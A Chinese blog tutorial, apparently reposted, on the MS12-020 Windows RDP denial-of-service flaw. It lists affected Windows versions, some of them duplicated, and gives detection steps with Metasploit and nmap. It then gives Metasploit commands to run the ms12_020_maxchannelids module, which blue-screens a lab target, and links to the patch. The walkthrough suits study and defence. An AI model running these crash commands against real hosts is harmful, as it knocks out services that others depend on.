MS12-020 windows RDP协议 漏洞利用(蓝屏)


漏洞描述

   远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。
   远程桌面协议服务允许远程攻击者通过一系列精心设计的数据包,导致出现拒绝服务漏洞。

影响版本

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 SP2(用于基于 Itanium 的系统)
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008(用于 32 位系统)Service Pack 2
  • Windows Server 2008(用于基于 x64 的系统)Service Pack 2
  • Windows Server 2008(用于基于 Itanium 的系统)Service Pack 2
  • Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1
  • Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1
  • Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1
  • Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1
  • Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1
  • Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1
  • Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1
  • Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1

漏洞检测工具

kali

启动msf

msfconsole
#查找exp
search ms12-020

#使用exp
use auxiliary/scanner/rdp/ms12_020_check

#设置目标ip
set rhosts 192.168.234.

run

如果提示The target is vulnerable.表示存在漏洞

在这里插入图片描述

windows

windows下直接利用nmap进行检测,nmap中的script目录中存就在ms12-020的检测脚本

在这里插入图片描述

使用方法:

#nmap ip --script=rdp-vuln-ms12-020.nse
nmap 192.168.234.129 --script=rdp-vuln-ms12-020.nse

如果提示VULNERABLE表示存在漏洞
在这里插入图片描述

漏洞利用

打开kali,启动msf进行

msfconsole

选择exp,并设置目标ip

search ms12-020
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhosts 192.168.234.129
run

在这里插入图片描述

漏洞加固

Microsoft已经为此发布了一个安全公告(MS12-020)以及相应补丁:
链接:http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020

猜你喜欢

转载自blog.csdn.net/weixin_41924764/article/details/109666273